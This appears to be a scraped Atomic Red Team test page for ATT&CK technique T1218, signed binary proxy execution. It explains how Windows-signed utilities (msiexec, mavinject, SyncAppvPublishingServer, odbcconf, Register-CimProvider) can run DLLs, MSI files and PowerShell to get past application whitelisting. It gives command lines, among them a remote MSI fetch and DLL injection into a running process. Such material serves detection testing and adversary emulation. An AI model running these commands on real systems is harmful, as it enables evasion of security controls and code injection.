Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.(Citation: LOLBAS Msiexec)(Citation: Rancor Unit42 June 2018)(Citation: TrendMicro Msiexec Feb 2018) Msiexec.exe may also be used to execute DLLs.(Citation: LOLBAS Msiexec)
msiexec.exe /q /i "C:\path\to\file.msi"msiexec.exe /q /i http[:]//site[.]com/file.msimsiexec.exe /y "C:\path\to\file.dll"Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)
"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)
Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The utility can be misused to execute functionality equivalent to Regsvr32 with the REGSVR option to execute a DLL.(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}Several other binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)
-
Atomic Test #1 - mavinject - Inject DLL into running process
-
Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| dll_payload | DLL to inject | Path | C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll |
| process_id | PID of process receiving injection | string | 1000 |
mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| powershell_code | PowerShell code to execute | string | Start-Process calc.exe |
SyncAppvPublishingServer.exe "n; #{powershell_code}"
Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| dll_payload | DLL to execute | Path | C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll |
C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}